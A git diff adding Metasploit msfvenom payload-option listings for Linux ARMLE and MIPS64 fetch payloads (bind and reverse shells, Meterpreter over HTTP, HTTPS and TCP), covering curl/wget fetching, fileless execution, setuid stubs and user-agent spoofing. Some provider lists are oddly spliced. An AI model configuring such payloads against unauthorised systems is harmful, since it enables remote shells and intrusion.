Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-shell-bind_tcp.txt new file mode 100644 index 0000000..2a8cfa6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-shell-bind_tcp.txt @@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager + Module: payload/cmd/linux/http/armle/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DNCjskbcX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + dup2 socket in r12, then execve. + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-shell-reverse_tcp.txt new file mode 100644 index 0000000..d54ee5a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-shell-reverse_tcp.txt @@ -0,0 +1,93 @@ + + Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/armle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME GqKkLiLQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + dup2 socket in r12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-shell_bind_tcp.txt new file mode 100644 index 0000000..9078462 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-shell_bind_tcp.txt @@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/armle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME spYHQrQwU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Connect to target and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-shell_reverse_tcp.txt new file mode 100644 index 0000000..fcf684a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-shell_reverse_tcp.txt @@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/armle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EzSqYGrB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..ecbb6e4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mips64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jkofOBXy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..9a188e5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mips64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME nqGcBdJTD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..c972f3e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mips64-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mips64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME qPigzETmWu no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case 